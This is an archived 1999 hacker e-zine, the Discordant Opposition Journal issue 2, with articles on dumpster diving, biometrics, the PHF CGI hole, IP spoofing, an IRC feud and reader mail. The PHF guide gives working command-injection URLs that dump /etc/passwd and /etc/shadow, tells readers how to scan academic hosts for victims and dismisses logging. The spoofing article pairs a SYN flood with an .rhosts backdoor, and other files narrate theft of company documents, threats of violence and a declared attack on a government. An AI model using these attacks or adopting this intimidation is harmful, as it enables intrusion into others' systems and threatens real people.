💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › DOJ › doj-02.tx… captured on 2022-01-08 at 15:30:36.
⬅️ Previous capture (2021-12-03)
-=-=-=-=-=-=-
___________.__ ________ ____.
\__ ___/| |__ ____ \______ \ ____ | |
| | | | \_/ __ \ | | \ / _ \ | |
| | | Y \ ___/ | ` ( <_> )\__| |
|____| |___| /\___ > /_______ /\____/\________|
\/ \/ \/
:The Discordant Opposition Journal Issue #2:
:Feb 99, Third release, http://www.Rue-the-Day.net/discordia:
::::::::::: Editor-in-Chief :::: Rue-the-Day :::::::::::
::::::::::: Chief-in-Editor :::: Cronus :::::::::::
::::::::::: Assist Editor :::: Digital Avatar :::::::::::
::::::::::: In-House Writer :::: Kleptic :::::::::::
::::::::::: Hosting :::: ethercat :::::::::::
E-Mail discordia@Rue-the-Day.net
"There are no mere facts, only interpretations"
- Nietszche
Special thanks go out to Michael Perryman
for contributions to the Gallery.
:The Discordant Opposition Journal Issue 2, February 1999.
All Rights Reserved. Nothing may be reproduced in whole or
part without written permission from the editors. The DoJ is
made public at irregular periods, but don't worry you won't
miss us.
:This is the third issue of the DoJ, issue #2 and the Editors
and staff would like to dedicate this release to the workings
of eccentricMind. Founder of the Discordant Knights and leader
of this electronic revolution. Thanks eM.
:Contents:
File 1 - Editorial : Editors
2 - The Joys of Trashing : Rue-the-Day
3 - The Darkedge Incident : Editors
4 - The Science of Biometrics : Cronus
5 - The Complete Guide to PHF : Digital Avatar
6 - Interview with Digital Avatar : Editors
7 - Behind IP Spoofing : Cronus
8 - Ask Dr. Klep : Kleptic
9 - The Viewing Public : Audience
10 - Conclusion : Editors
:Editorial:
Well, here we are. Welcome back to the Famed Goldmines of The
Discordant Opposition Journal. The true Underground E-Zine for
the future. We managed to churn out another issue. This it the
third issue, #2. Don't ask why its number 2 and issue 3. I blame
it on one of Rue's made drinking binges.
I am writing this on a Sunday afternoon. I went to bed at 7:45
this morning and got only 3 hours sleep. Rue and myself spent
8 straight hours slouched infront of a computer screen. We took
turns sitting at the computer picking through networks and stuff.
In the end, it was quite uneventful but it was informative. We
may do a write-up of Moroccan government security protocols in a
future issue. Yes, you read right, we too are Publicly announcing
our distaste on Moroccan Human Rights. The country is so antiquated
that they do not as of yet have a proper voting system. Some would
say that to vote the public must be educated. But those that are
undereducated would have no want to vote thus nullifying that
argument.
Why should Moroccan people, who are no different to us, suffer
more simply because democracy hasn't reached them yet. When
freedom is threatened in Middle Eastern countries or Eastern
Bloc Countries the Allied forces are swift to intervene, but they
have all chosen to stay well out of the Moroccan problem.
The Knights of Dynamic Discord have told the Editors that currently
they are launching an information attack on the resources of Morocco
and its government. They have issued this statement;
'No one deserves this and we who are able to, should
fight for their rights. The Knights of Dynamic Discord
hereby declare information war on the infrastructure
of the Moroccan Government.
All Hail Discordia !'
-Issued by Deadpool and eccentricMind.
That is the editorial for this issue. We the Editors of The DoJ
hereby claim no responsibility or involvement in any KoDD actions.
The conclusion has the usual junk in it about the Zine.
Thank You.
Cronus, Rue-the-Day
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99
::: The Discordant Opposition Journal ::: Issue 2 - File 2 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:The Joys of Trashing:
Rue-the-Day
Prologue:
Rue-the-Day and Cronus, your intrepid DoJ editors,
caught momentarily in a van's headlights as they try to blend
into the shadows. The van is 'Group 4 Security' - private rent
a cop types. Rue-the-Day and Cronus are standing in the darkness
between two Microsoft buildings. The van's driver fails to
notice them and continues on his rounds. The two hackers breathe
a sigh of relief and start back towards the main road....
Onwards:
That night had already been eventful. Earlier on we had
prowled around two other Microsoft 'campus' areas. The first
had been dull, lots of CCTV cameras and bins padlocked into
cages. The second area had been of greater interest. Myself
and Cronus had noticed a row of bins and a dumpster in a
parking lot beside a building. We peered into the dumpster
and found nothing much until I noticed that one of the bins
was labelled "Paper Waste Only".. Hehehe. We took the lid off
the bin and started going through the blue tinted bags for
documents of interest. This activity had us absorbed until
we heard a key turning in a door behind us. As we turned we
saw a guard trying to get the door of a nearby building open.
After some fumbling he succeeded and the appropriate thing to
do seemed to be to run like bloody hell. I squeezed through the
gap between the dumpster and bin and tried to run. The problem
was, I wasn't moving - my backpack was stuck.
Cronus was understandably concerned - he was in the path
of the rapidly approaching (pissed off looking) security guard.
He punched my backpack through the gap and we both sprinted off
carrying bags of Microsoft documents with us. We ran out into
traffic, over a large mound of dirt and across a patch of
wasteland before finally stopping. At the bottom of this file
are some interesting extracts from our find...
Advice:
Some general things to keep in mind. Try your best to be
selective when trashing, discard unnecessary stuff - it'll just
weigh you down. Choosing to trash either by day or night both
have inherent advantages and disadvantages.
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99
::: The Discordant Opposition Journal ::: Issue 2 - File 3 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:The Darkedge Incident:
The Editors
Darkedge is an Irish guy who hangs out on Dalnet. Cronus is also
Irish and also hangs out on Dalnet in roughly the same areas as
Dark. Cronus had been mail bombed with an expression that Dark
had yelled at him earlier after being kicked from a channel that
Cronus was opped in. And Cronus went looking for Darkedge on IRC.
/whois Darkedge
Gave this;
[ %%%%%%%%%%%%%%%%%%(whois info: Darkedge)%%%%%%%%%%%%%%%%%% ]
[ address ] dark@apollo.netsoc.tcd.ie
[ quote ] Dark Edge
[ channels ] @#tcdnerds #hackers_ireland
[ server ] liberty.nj.us.dal.net
Tdc.ie is Trinity College Dublin in Ireland and he was at the computer
labs there in the city centre. Cronus and Rue were at Cronus's house
online.
<Darkedge> hi
<^cronus^> I had some trouble with my mail account ealrier
<^cronus^> don't suppose you know anything about it ?
<Darkedge> ohh
<Darkedge> thats right
<Darkedge> me
<Darkedge> well thank you for your faith in me cron
<^cronus^> What ?
<^cronus^> I have no faith in you
<^cronus^> do you know about it ?
<Darkedge> can i ask a question
<^cronus^> what ?
<Darkedge> am i the first person that came to mind about it
<^cronus^> I have already asked 5 people today
<Darkedge> heh
<Darkedge> just askin
<Darkedge> nope
<Darkedge> not me
<^cronus^> what wasn't you ?
<Darkedge> mail bombing is for lamers
<^cronus^> YOU FUCKER
<^cronus^> I never fucking mentioned mail bombing
<^cronus^> you WANKER !
<Darkedge> what else would it be
<^cronus^> could have been a virus, lack
<^cronus^> of working server
<^cronus^> anything...
<Darkedge> jeasus
<^cronus^> you fuckin idiot you're fucked
<^cronus^> Rue has vaguely mentioned breaking of legs...
<Darkedge> what??
<Darkedge> fuck you ....let rue try...i have nothing to do with
any shit you are saying....go blame someone else
<^cronus^> right so then
<^cronus^> will you still be in town in 15 minutes ???
<Darkedge> what are you talking about
<^cronus^> Rue will be there in a few minutes is that ok ?
<^cronus^> he is in temple bar at the moment
<^cronus^> at a cyber cafe...
<Darkedge> what are you on ??
<^cronus^> you got yourself into a shit storm now
<Darkedge> are you playing a fucking joke on me??
<^cronus^> a joke ?
<^cronus^> you asked for Rue to break your legs
<^cronus^> does it sound like Rue's laughing ?
At this point, Cronus and Rue set up a Back Orifice server to bounce
a connection from a Cyber Cafe to IRC. They had been at the BetaCafe
in the City earlier that day and set it up.
[join(#hackers_ireland)] Rue-the-Day (BetaCafe@betacafe3.betacafe.ie)
[mode(#hackers_ireland)] "+o Rue-the-Day" by ChanServ
<Rue-the-Day> Sup All
<Darkedge> Rue?
<Rue-the-Day> Hi Cronus
<Darkedge> what the fuck is going on
<Rue-the-Day> Hey Daxxx, Zeris
<Rue-the-Day> ahh Darkedge
<^cronus^> Hey RUE !
<Darkedge> what am i being blamed for??
<Rue-the-Day> I'm in the beta cafe in temple bar
<Rue-the-Day> what seems to be the trouble ??
On checking where Rue was, it seemed that he wasn't simply at Cronus's
house but actually in Town near Trinity College. At this point we were
both beginning to laugh heartily.
[ %%%%%%%%%%%%%%%%%%(whois info: Rue-the-Day)%%%%%%%%%%%%%%%%%% ]
[ address ] BetaCafe@betacafe3.betacafe.ie
[ quote ] Rueful
[ channels ] @#hackers_ireland
[ server ] powertech.no.eu.dal.net
<Darkedge> Im in trinity
<Rue-the-Day> Your in trinity ? I could be there in a minute or two...
<^cronus^> Rue is kinda protective of his friends
Darkedge was pretty scared by this stage, but the plot went on.
<Rue-the-Day> anyway I have to go
<Rue-the-Day> I'll be back on later
<Rue-the-Day> places to go, people to see
<^cronus^> cya Rue - maybe later
<Rue-the-Day> anyway gotta go
[signoff(#hackers_ireland)] Rue-the-Day (Quit: Gone to Trinity)
<Darkedge> hang on rue
<Darkedge> shit
Cronus continued to talk with Darkedge in private. Rue was hysterical
at this point.
<^cronus^> How long do you think Rue can walk from Temple Bar ?
<^cronus^> 5 minutes ? you think
<^cronus^> although he is very tall and walks fast
<Darkedge> i will be here all night
<^cronus^> whats wrong ?
<^cronus^> afraid to face him ?
<^cronus^> I've meet you and your half his size....
<Darkedge> yeah well
<Darkedge> well i have a lot of friends so
<^cronus^> alot of friends ???
<^cronus^> they won't protect you
<^cronus^> you haven't meet Rue
<Darkedge> its a pity really
<Darkedge> see here is the thing
<Darkedge> he can throw as many punches as he wants ... i dont care
<^cronus^> the doctors will care !
<^cronus^> and who mentioned punchs
<^cronus^> its the metal bar you should worried about
<Darkedge> he can kill me...like i give a shit
<^cronus^> I'm sure he'll try
<^cronus^> you don't care for your life ?
<^cronus^> cause niether does he !
<Darkedge> ahh well
<Darkedge> just wish it could have been different
<^cronus^> I can't wait to see this
<^cronus^> Infact
<^cronus^> I think I'm gonna come into town
<^cronus^> and have a look at the bruises
<^cronus^> ... hehe ...
<^cronus^> Cya in about 15 minutes
Cronus quit off IRC but then came back right away and Darkedge had
already gone off. Cronus and Rue were both far from the City Center,
but Darkedge left Trinity afraid that Rue was on his way. It was
never mentioned again, but at the next 2600 Meeting in the City,
Darkedge pulled Cronus and Rue aside and apologised and claimed
innocence.
We both still laugh about the whole thing to this day. Beware.
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99
::: The Discordant Opposition Journal ::: Issue 2 - File 4 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:The Science of Biometrics:
Cronus
Biometrics is the upcoming science of authorising people by
their individual physical characteristics. Finger printing is
the oldest and most widely used biometrics.
I was waiting for this file to be published by a large Hacking
site that will go unnamed. Each time I dropped by, it would still
say Not yet finished, check back next month. So I decided to
write the article myself and here you go.
Explanation
Passwords have been shown to be unsecured time after time. It
is a widely held believe that the weakest part of any security
system is the password. Behind the password is a User, who is
forgetful and absentminded at the best of time. So modern
science has stepped up to the plate and offered an alternative.
Biometrics is the art of recognising individuals by their unique
and untransferable physical characteristics.
Biometrics are by no means new. They have been around for years
but until recently the price was always a limiting factor. The
US military have used it as a form of authentication since well
before the cold war. No, however, finger print readers are cheap
enough to be built into keyboards and mice.
Biometrics are so unique that they need never be changed. They
are part of you, so they can never be stolen. They are constant
and effortless to use. And they are extremely safe. For example
the eye scanner from the New Jersey based company Iriscan, offers
the odds of one-in-10 to the power of 78.
The Fingerprint
It has been the practice of Police and Government agencies all
over the globe to use the unique pattern of the fingerprint as
a form of Biometric. This is both cheap and easily maintained.
An example of PC fingerprinting is Sony Corp.'s Puppy Logon
System at www.iosoftware.com. Cheap, reliable and already in the
mainstream.
As the fingerprint has been in use for so long. It has proved
itself as a reliable Biometric and also it has dropped in price.
The Hand
A handprint is simply an fingerprint on a larger scale. Hand
scanners, such as the $2,150 HandKey manufactured by Recognition
Systems Inc., measure the hand's geometry rather than fine skin
patterns, so they're useful in places such as shop floors and
manufacturing operations, where dirt and nicks could cause
problems with a finger scan.
As yet pretty well untested on a large scale. But still very
cheap. Fairground 'Love Testers' are often based on a hand scanner
and this shows there ease of use and cheapness.
There is a new technique that records the vein pattern at the back
of the hand. This technique looks promising, but it exists only in
a prototype system, and no extensive tests to determine the
performance of the method have been done. However, this could well
become an important biometric identification method.
The Eye
A person's eye is as unique as a fingerprint and can be used to identify someone.
IriScan Inc.'s namesake product keeps an eye on high-security
facilities. The unique pattern of the iris of the eye is measured
and compared to a database of known values. The pattern on the
iris is so unique that the chance of mix-up is infinitesimally small.
IriScan is designed for physical access control, generally coming
in the form of a wall mounted reader. The system is currently in
use in prisons and military facilities for its security. As the
pattern matching software is currently being adapted to accommodate
face recognition for future planed products.
The reader, software and PC cost $6,500. IriScan can be reached at
www.iriscan.com.
The Face
The ideal biometric identification method would be automatic face recognition. This is a difficult pattern recognition problem because heads can rotate and move in various ways. Pattern recognition
software can be used in airports and border crossings to catch
criminals and terrorists. The facial software matches distinct features
of the human face to a digitally recorded copy to determine if the
scanner recognises you.
Very new and still quite experimental. This form of Biometric can't
really take into account the change of appearance caused by ageing,
sickness or hair growth. Extremely complex software must be written
to ensure the error level of the system is kept to a minimum. If
short, not a very secure Biometric.
More than a dozen vendors offer facial recognition products, which
can cost as little as $150 to $300 per node.
The Voice
Voice verification is by far the most socially acceptable Biometric.
It combines ease-of-use with lack of cost. It has several distinct
advantages over the other biometric techniques. First, it's perfect for telecommunications applications. Second, most modern PCs already have the necessary hardware. If they don't, a 16-bit sound card can be purchased for about $50, and a condenser microphone costs about $10.
Voice patterns are easily recorded and digitised, but the voice
changes because of the time of day, illness and background noise. This
means that even though this is perhaps the most convenient Biometic
it is also probably the most insecure. Taped speech has been known to
defeat this medium of authentication. Hardly secure.
The Signature
Some Biometric products observe hand-written signatures. The process
requires a digitising tablet such as a Wacom PenPartner. Not widely
used and not secure at all. The signature is as weak as a password.
Only a Biometric by the vaguest of senses.
The Smart Card
The Biometrics of the future will possibly be packaged with Smart
Cards. Your individual Biometric data will be hard-coded into the
Smart Card and not matter where you are, the Biometric will be able
to verify that it is really you once you have your Smart Card.
Security
Most Biometrics are quite secure and that is why they are favoured
to te antique password. But simply because its a Biometric doesn't
make it secure. Anywhere that needs the level of security that comes
with a Biometric should do some research to ensure that they are
getting a suitable type.
The US military has been using many different forms of Biometry for
years and this stands for its reliability and overal security. Not to
be underestimated, but Biometrics will become the next major obstacle
for the Wily Hacker.
Links
Here are links to more information on Biometrics;
Security gets a facelift
http://www.zdnet.com/pcweek/reviews/1027/srbio.html
How biometric technology will fuse flesh and machine
http://www.privacy.org/pi/reports/biometric.html
Biometrics Consortium
http://www.biometrics.org/
Fight the Fingerprint
http://www.NetworkUSA.org/fingerprint.shtml
Show me some ID
http://www.zdnet.com/pcweek/news/0112/12bio.html
Biometrics Explained
http://www.ncsa.com/services/consortia/cbdc/explained.htm
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99
::: The Discordant Opposition Journal ::: Issue 2 - File 5 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:The Complete Guide to PHF:
Digital Avatar
1. What is PHF?
The PHF (packet handler function) white pages directory
services program distributed with the NCSA httpd, versions
1.5a and earlier, and also included in the Apache distribution
prior to version 1.0.5, passes unchecked newline (hex 0a)
characters to the Unix shell. Unauthorised access to the server
host may allow an intruder to read, modify, or destroy files.
The phf program implements a form-based interface to a local
CCSO Name Server. The CCSO Name Server is a white pages service
used for looking up name and address information about people.
With phf, a hacker can execute commands on the server host
using the same user-id as the user running the "httpd" server.
If "httpd" is being run as root, the hacker's commands are also
run as root. He can access any file on the system that is
accessible to the user-id that is running the httpd server.
The phf phone book script file in the cgi-bin directory can
be exploited to give a hacker the password (etc/passwd) file in
Unix systems. The phf phone book script is distributed with NCSA
and Apache httpd. This default file is a sample form titled "Form
for CSO PH query" and can be exploited to view files on a system.
The phf exploit is one of the most common ways of obtaining
password files of of systems on the internet.
2. How do I use PHF?
Alright. To use PHF you enter the following command line into
any web browser:
http://www.target_goes_here.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
This takes you to the /etc/passwd file of the target computer.
Neat, huh? Anything after Qalias=x%0a/bin/ is the command. You can
do virtually any command. You cannot edit files though. It doesnt
work.
Examples:
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/shadow -displays the
shadow file
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd -displays the
passwd file
/cgi-bin/phf?Qalias=x%0a/bin/ls%20/ -lists the root dir
/cgi-bin/phf?Qalias=x%0a/bin/ls%20/bin -lists the bin dir
/cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/bin -lists the bin dir
and shows file permissions
/cgi-bin/phf?Q=%0aid - gives you the uid of nobody
/cgi-bin/phf?Q=%0a/bin/uname%20-a - give operating system
/cgi-bin/phf?Q=%0apwd - print working directory
/cgi-bin/test-cgi?* - get all files in /cgi-bin/
/cgi-bin/test-cgi?/* - get all directories
/cgi-bin/nph-test-cgi?* - get all files in /cgi-bin/
/cgi-bin/nph-test-cgi?/* - get all directories
/cgi/bin/phf?Q=%0a/bin/ypcat%20passwd - get ypcat passwd
3. What happens if it says "404 Error" or "Caught on Candid
Camera"?
Well, a 404 Error indicates that the target is patched of this
hole already or that they do not have PHF on their system, among
other things. If it gives you a 404, move on to a new target.
Caught on Candid Camera is a small joke in a way. When you get
this screen it means they have logged that you have just tried
to access them via PHF. Don't worry about getting caught though.
They hardly ever report it. Just don't go try the same place every
time. If they are logging you then they might get a little curious
after you try PHF on them 10 times. Use PHF wisely.
4. How do I find new targets?
The usual way to get new targets is to pick a country, say Japan.
Go to www.altavista.com, next and search for "ac.jp". This will
turn up a lot of results from the academic hosts in Japan. Take
each listing's address and put it before the /cgi-bin in the PHF
command line. You can scan all the results quite quickly if you
have two browser windows open. One contains:
http://www.target_goes_here.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
The other contains your altavista search. Simply Copy the address
from altavistsa and paste it onto the www.target_goes_here.com in
your other window. You can go through 75-100 sites quite easily. I
tend to get about 1/100 hits that have a usable PHF. Don't expect
anything better...
-Digital Avatar
apparitione@gmx.de
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99
::: The Discordant Opposition Journal ::: Issue 2 - File 6 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Interview with Digital Avatar:
Shortly after we first DoJ was released we already decided that
we need Staff. Digital Avatar was the first. He quickly became
the Assistant Editor. Helping with promotion, editing and also
submissions.
DoJ: How long have you been in the h/p scene ?
DA: Since about 1992. I was 13 then and I was just playing around,
but it helped...
DoJ: What drew you in ?
DA: I had watched some movies here and there and had seen some
things on the news. So I decided to just check a few things out.
My very first impression of the scene occured when I typed
"Hacking" into Yahoo. It really is that easy.
DoJ: What particular aspects interest you ?
DA: The 'culture' of the underground. It is a vastly changing
region. One day a so-called wizard can be declared lame by
hundreds of people and thats that. There isnt the usual
cover-up of things here on the scene. The entire style is
different than the real world. Its quite intersting.
DoJ: What would you attribute to your main decision to want
to learn ?
DA: Probably all the clueless and not-so-clueless people out
there who are bored and want to push their computing power
beyond 'normal' boundries. Anyone can master these kind of
things...so why shouldnt you try it once, at least?
DoJ: Have you ever been caught ? or gotten close ?
DA: Yes. My ISP's have gotten mad and threatened me and
cancelled my service a bunch. I try not to do anything that
will land me in jail. Do I play it safe? Yes.
DoJ: Do you follow any set of morals or is the chase of
knowledge more important ?
DA: I dont hack politically, racially, for pr0n, power, or
anything like that. I do it to test myself. It truly is the
best game there is...
DoJ: On a topical subject, what is your opinion of the
current trend to attack unfavourable countries ?
DA: I think that is really the wrong thing to do. Tampering
with or "destroying" the computers of unfavorable countries
is not going to do any good. The people need to be changed,
not the machines.
DoJ: Whats the one thing you want the world to know about you ?
DA: I hate printers.
DoJ: Where and how can you be contacted ?
DA: E-Mail is the only sure way to reach me. I'm currently
using apparitione@gmx.de. If I change my address and you get
too stressed out then go and take a look at my page
[ http://members.xoom.com/damatrix/ ] and click "contact".
That will always have an address that I will be receiving at.
DoJ: Perhaps a quote to finish off with ?
DA: 'Trust No One'
Fill-in the Blanks;
Choice of Women: 'Dumb Blondes'
OS: FreeBSD on a 486
Food: Chips, Fries, Pepsi, and OJ [ not mixed ]
Music: Pop/Techno...Beck, Beastie Boys, etc
Films: Armageddon, the James Bond films...
Sites: hackernews.com, cnn.com, yahoo.com
DoJ: Anything else ? A comment to someone you don't like
perhaps...
DA: I think that everyone needs to have more fun. People
are too stressed out.
DoJ: Thanks Digital
DA: No problem... just get your hand off my thigh... !::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99
::: The Discordant Opposition Journal ::: Issue 2 - File 7 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Behind IP Spoofing:
Cronus
IP Spoofing is the art of hiding a connection behind packets
that seem to come from some arbitrary source. Fooling a server
into thinking your connection is coming from a spoofed source.
This is the means by which a trust-related attack would take
place. By appearing to come from somewhere else you would be
able to circumvent any form of source authentication such as
the legendary 'r' commands.
I have taken the liberty of assuming that the reader has a
partial knowledge of TCP and IP protocols. But if you don't
there are references to some essential reading at the end.
The one serious drawback to IP spoofing trust-related exploits
is that the initial attack is blind. Since you are impersonating
another server, you will be unable to accept any response from
the server under attack.
Establishing a Connection
The TCP protocol is technically defined as a protocol developed
to allow co-operating computers to share resources across a
network. In other words, share a connection to transfer data.
TCP is the most widely used connection-oriented transport
protocol in the TCP/IP suite. This basically means that the two
hosts involved must both first establish a connection through
the form of 3-way handshake. All the 3-way handshake does is
set up the routines to transfer data. Sequence numbers of both
the hosts are exchanged so that a connection can be created.
This 3-way handshake makes TCP harder to spoof then simple IP
packets.
The connection handshake is as followed;
X ---SYN---> Y
X <--SYN/ACK-- Y
X ---ACK---> Y
To begin with host X sends an IP packet with the SYN flag to
Y. This tells host Y that a connection is about to be set up.
The sequence number that X sends will now be set as the ISN
(initial sequence number) for future communication. Host Y next
will reply with its own ISN with the SYN flag on and an ACK flag.
The ACK flag acknowledges X's first packet with its ISN plus one.
X then ACK's the other hosts ISN and communication can take place.
The Sequence Number
TCP is marketed as the reliable internet protocol. It accounts
for all packets, resends lost packets and rearranges out of order
data. The sequence number is used so that the other host can
acknowledge receipt of the packet. The receiving end uses the
sequence number to ensure proper ordering of the data and to
eliminate duplicate data bytes.
Sequence numbers are simply 32-bit variables. They range from 0
to 4,294,967,295. Each packet sent across a TCP connection is
sequenced. TCP uses the concept of window advertisement for flow
control. The sliding window tells the other end of the connection
how much data can be buffered, the window size is 16-bits so a
receiving host can advertise up to a maximum of 65535 bytes. This
process can be thought of as a means to ensure that neither host
begins to transmit above the acceptable level of the other host.
In order to spoof a connection, you must understand how sequence
numbers are chosen and how they change throughout the connection.
The sequence number when a host is first booted is set to 1. The
initial sequence number is incremented by 128,000 every second.
This causes the 32-bit ISN variable to wrap every 9.32 hours is
no connections occur. But whenever a connection attempt is issued
the ISN jumps by 64,000.
This process is there to eliminate the possible problem that
data from an old connection could arrive and damage the current
connection. This is why random sequence numbers are not used.
There would be no way to guarantee that arriving data would have
a different sequence number as stray data that finally freed
itself from a routing loop somewhere.
Other Flags
TCP header flags include RST (reset), PSH (push) and FIN (finish).
The RST flag causes the connection to be immediately torn down.
The RST flag is basically an in-built error message for when one
host breaks the already established rules of connection. The PSH
flag tells the receiver to send all the queued data as soon as
possible. The FIN flag is the means whereby a host naturally
closes a connections.
Syn Flooding
Once the trusted host is found, it must be disabled. Since the
attack intends to impersonate it, it is necessary to make sure that
the host cannot receive any extra network traffic. If it gets the
TCP packets from the target host, it would send a packet to close
the connection thinking it was an error.
The best way to deny packets access to a server is to lock it up
with some form of Denial of Service attack. This is quite a complex
operation and requires much research.
We have seen above how TCP connections are created and these steps
to creating a connection can be used to the disadvantage of the
trusted host. A Syn flood is a flood of specially crafter packets
with the Syn flag marked from a random source. The trusted host
picks up the packet and thinks that a connection is about to be
made and sets up the appropriate service.
By flooding the trusted server with random Syn packets it is
possible to fill up the Process table and leave no more room for
new incoming packets. As the connections time out while the trusted
server waits for confirmation of the connection, it is necessary
to fill the gap that is left. The attacker can send multiple Syn
packets every few seconds to the trusted host and keep it occupied.
For more information this complex subject see the notes at the
end of the file.
The Attack
To use IP spoofing as an attack you must first choose a target
and work out a trust-relationship that exists on that server. The
sequence numbers are calculated. The trusted server is put into
a continual Denial of Service attack and then impersonated. The
attacker then simply issues a command to give him/her a way back
in.
Here is a step by step outline of the attack;
X(forged as Z) ---SYN---> Y
Z <--SYN/ACK-- Y
X(forged as Z) ---ACK---> Y
X(forged as Z) ---PSH---> Y
The first packet from the attacker has the source IP address
spoofed as Z which is the trusted host. Y responds with an Ack
of the first packet to Z, but since the trusted host Z is in
the middle of a storm of Syn packets it does not receive the
Ack packet.
The attacker must pause for a moment so that the target host
Y actually has time to send the Ack packet. Then X sends its
own Ack packet with the presumed sequence number plus one since
it is the second Ack. If the calculated sequence number is
correct then by the last stage the target host believes it is
connected to the trusted host Z and data can be sent.
Since the attack is blind, the general idea once the trust has
been exploited is to insert a backdoor into the system. The
most simplest could be 'cat + + >> ~/.rhosts`. This is a good
idea because it is quick, allows for simple re-entry, and is not
interactive. Remember the attacker cannot see any traffic coming
from the target, so any responses are sent off into oblivion.
Summary
IP spoofing is not difficult because IP is easily forged. This
attack works because many network connections rely on source
authentication. The presumption is that source authentication is
that it is easy and safe. But it is most definitely not the latter.
The most difficult part of this attack is the sequence number
calculation. This takes timing, skill and guesswork.
Resources
Request For Comments: 793, 1825, 1948
IP-spoofing Demystified - Trust-Relationship Exploitation
by daemon9 / route / infinity
http://www.phrack.com
SYN Floods The cause and Cure
by NeonSurge
http://www.rhino9.org
Introduction to the Internet Protocols
by The Computer Science Facilities Group
http://homepages.iol.ie/~cronus/ip/info70.txt
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99
::: The Discordant Opposition Journal ::: Issue 2 - File 8 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Ask Dr. Klep - "Kleptic's Views":
kleptic@grex.org
Well, this text is just about what I've been thinking about
lately. I've been thinking about many topics, some important,
some not.. like "Why do you press harder on your remote
controller for your TV when you know the batteries are dead"
or "What would a chair look like if your legs bent the other
way!?" and the most important, "If a tree fell in the woods
and no one was around to see it, would the other trees make
fun of it!?" Those are the not so important things I've been
thinking about..
Yeah know what really pisses me off, all that Bill Clinton
and Monica shit. I'm really tired of hearing about that.. and
I'm sure all of you are too. First of all, I don't want him
impeached, but I do think he's a jackass. Hey would you want
Al Gore as president of the USA? I know I wouldn't. Yeah see I
don't think like most 'computer analysts' or "hackers", most
Hackers/phreaks/crackers/warez d00dz are mostly "anarchist". I
believe in order in a country, if there wasn't any order people
would cause havoc all the time.. and people would die. And I'm
sure no one REALLY wants to die.
And how come older people or adults think that teenagers, or
people in the age area of 14-21 are nothing but a bunch of rowdy
misfits!? And that we all have nothing to do but do drugs and
have sex? That's not all true in fact. Not all kids do drugs or
have sex. Yeah see I live a lifestyle that most of you have
probably heard about. Its called "Straight Edge". Straight Edge
meaning a drugfree lifestyle, 'don't drink and don't smoke"
those are the rules of today... before back in the 1980's the
rules were "Don't Drink, Don't Smoke, Don't Fuck" The term
"Straight Edge" was coined by Ian McKaye, the singer from a
1980's hardcore/punk band called "Minor Threat". But im not
gonna get into the history, I'm just trying to make a point.
This text is kinda short, and most of you probably don't give
a rats ass of what I'm thinking about, but I'm just trying to
make a point, This is the way I feel, and I personally don't
give a shit if you think otherwise.
For the next instalment of "Ask Dr. Klep" I will need all of
you to e-mail me questions or comments of anything in this
text, or any other texts that I've written before, or any
technical questions, I will answer them in the next Issue of DoJ.
Thank You,
Kleptic
kleptic@grex.org
http://wwz.net/kleptic/
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/98
::: The Discordant Opposition Journal ::: Issue 2 - File 9 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:The Viewing Public:
This is our mailbag. Our dirty electronic linen. Basically a
dumping ground for mail we get about the DoJ but occasionally
we will throw in a snippet that we consider humorous, scary
or just plain disturbing... Cronus recently had an article
printed in the Print Publication of Blacklisted 411 and
received many mails on the topic, they are answered here.
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
From: Core <doniec@cyberspace.org>
Subject: Co-operation
I was just checking out your page and was wondering whether or
not you would like to co-operate with me in attempting to bring
about a total Boycott of Tinet in order to get them to bring
down the phone charges?
Mail me here if you think we can work something out.
Freeman
:Its worth noting that Tinet is Telecom Internet, an ISP run by
the main telephone company here in Ireland. And unfortunately
boycotting them will not by any means reduce phone charges. Infact
since my site is a hacking site, whatever you had in mind is most
likely illegal and I amn't interested, but thanks for the thought.
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
From portcharlottesux@hotmail.com
Subject: Mailbombs
where can i download some decent chat bombs, mail bombs, im bombs,
icq bombs, or any other progees? i would be greatly appreciative.
e-mail me at portcharlottesux@hotmail.com
:My oh my, you seem to have a bit of an unhealthy obsession on your hands
there, well now that you've given out your email address in these hallowed
pages I'm sure somebody will 'help' you with your request. For the ICQ bomb
you'll have to send us your UIN, hehe..
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
From: "jastel marrell" <archive_@hotmail.com>
Subject: EUA
Greetings and Salutations Cronus,
Just got done reading your article in the latest edition of
Blacklisted 411. Good info. was wondering if you would be
interested in doing similar articles for the Electronic
Underground Affiliations E-Zine? The EUA is made up of various
hacker org's around the world and we like to put out a monthly
zine to keep our members informed of what's going on and what's
new in the hacker/phreak underground. You can find us on the
web @ "http://members.xoom.com/xxxxxxxx/" We've kept a low
key for the past few for a couple of reasons, namely the events
revolving around Kevin M. and Justin P. But alas, that has come
about in a manner most unwanted. Drop me a line and let me know
if you are up for writing a few articles for us.
Thanks
archive
:Hi archive, I responded personally and just wanted to comment
on your mail for our readership. I understand that you didn't
realise that I am editor of this Zine, but may I presume to ask
a few questions ? Why would a European E-Zine be worried about
the prosecution of US hackers ? And why would a Publication
choose for any reason to keep a low profile ? Why publish anything
if you have to keep it low profile ? I censored your URL as you
seemed very worried about staying low profile.
